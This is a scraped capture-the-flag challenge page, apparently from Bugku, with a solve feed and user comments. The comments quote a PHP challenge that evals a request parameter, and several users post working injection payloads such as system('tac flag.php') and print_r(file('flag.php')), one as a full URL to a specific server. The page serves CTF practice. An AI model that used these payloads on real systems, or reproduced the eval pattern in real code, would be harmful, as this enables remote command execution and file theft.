评分(9)
解题动态
16671766779 攻破了该题 5小时前
MonkeZ 攻破了该题 5小时前
13787026747 攻破了该题 5小时前
155598805811 攻破了该题 5小时前
5326 攻破了该题 5小时前
18469110745 攻破了该题 5小时前
迷茫的三千面 攻破了该题 6小时前
locust 攻破了该题 6小时前
cbcgqz 攻破了该题 12小时前
1431468079 攻破了该题 13小时前
冯新迪F 攻破了该题 13小时前
Authy425 攻破了该题 14小时前
2483632015 攻破了该题 18小时前
老鸭 攻破了该题 1天前
a234567 攻破了该题 1天前
550410825 攻破了该题 1天前
18305561253 攻破了该题 1天前
2845985939 攻破了该题 1天前
Arche 攻破了该题 1天前
评论
Hacker23 3年前
举报
http://114.67.246.176:10183/?hello=system('tac flag.php')
ZTyyds 2年前
举报
原理是什么啊???想了解一下
guoguo 3年前
举报
题目内容:<?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); ?> 可以使用hello=system('tac flag.php')或者?hello=10/print_r(file("flag.ph
dsadscxzewq 3年前
举报
为啥用cat不行呢?
痕夕 3年前
举报
看不懂,求解,大佬
SwBack 3年前
举报
大道至简,直接当作一句话利用即可 hello=system('tac flag.php')
巨人肩膀上的矮子 3年前
举报
@dsadscxzewq cat是可以的,只不过在源代码里查看
dsadscxzewq 3年前
举报
为啥用cat不行呢?
BBBugku 3年前
举报
F12查看源代码,且根据题目描述可以得知flag在flag.php文件中,且在源代码中发现hello并未赋值,因此只需在原有的url后添加 /?hello=10/print_r(file("flag.php")) ,刷新网页,找到flag。
krystalll 3年前
举报
感谢
lurnco 3年前
举报
Too young Too simple
Discuze奇 3年前
举报
我的金币不太允许了呀。。。
lurnco 3年前
举报
可以创个小号做后面的题人?
1amer 3年前
举报
直接读文件吧
你听说过呆呆吗? 3年前
举报
只有我一个人知道bugku更新了吗
storn 3年前
举报
我也是刚发现,而且,我原来的号好像没了,o(╥﹏╥)o